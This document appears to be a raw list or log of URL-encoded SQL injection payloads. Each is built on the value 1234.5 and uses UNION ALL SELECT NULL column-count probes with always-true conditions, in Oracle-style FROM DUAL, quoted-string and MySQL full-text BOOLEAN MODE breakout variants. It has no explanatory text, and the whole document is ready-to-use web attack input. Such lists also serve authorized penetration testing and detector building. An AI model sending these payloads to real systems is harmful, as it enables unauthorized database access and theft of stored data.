1234.5%20%2B%20%28SELECT%209423%20FROM%20DUAL%20WHERE%209999%3D9999%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%206082%20FROM%20DUAL%20WHERE%204129%3D4129%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209640%20FROM%20DUAL%20WHERE%201708%3D1708%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%201010%20FROM%20DUAL%20WHERE%208925%3D8925%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209928%20FROM%20DUAL%20WHERE%205512%3D5512%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202406%20WHERE%206427%3D6427%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%201932%20WHERE%201656%3D1656%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%208697%20WHERE%202985%3D2985%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202234%20WHERE%206370%3D6370%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%203961%20WHERE%204095%3D4095%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%201692%20WHERE%208855%3D8855%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209704%20WHERE%203853%3D3853%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207055%20WHERE%201004%3D1004%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%205875%20WHERE%206302%3D6302%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202033%20WHERE%203943%3D3943%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%27%20%2B%20%28SELECT%20%27ACYV%27%20FROM%20DUAL%20WHERE%206870%3D6870%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jUgH%27%20FROM%20DUAL%20WHERE%203215%3D3215%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27kkXP%27%20FROM%20DUAL%20WHERE%209669%3D9669%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UTFD%27%20FROM%20DUAL%20WHERE%209520%3D9520%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27VuJo%27%20FROM%20DUAL%20WHERE%201791%3D1791%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27BDPd%27%20FROM%20DUAL%20WHERE%207922%3D7922%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27qFVT%27%20FROM%20DUAL%20WHERE%207693%3D7693%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27AIIq%27%20FROM%20DUAL%20WHERE%209311%3D9311%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27AxLx%27%20FROM%20DUAL%20WHERE%205130%3D5130%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27sRtl%27%20FROM%20DUAL%20WHERE%202198%3D2198%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27onXd%27%20WHERE%205655%3D5655%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27xpEo%27%20WHERE%202954%3D2954%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ihLz%27%20WHERE%205344%3D5344%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27NDXZ%27%20WHERE%206170%3D6170%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27hRNj%27%20WHERE%202930%3D2930%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ualV%27%20WHERE%201345%3D1345%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27iaIz%27%20WHERE%202440%3D2440%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27phgS%27%20WHERE%209197%3D9197%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27dwPq%27%20WHERE%209233%3D9233%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UYhi%27%20WHERE%209615%3D9615%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 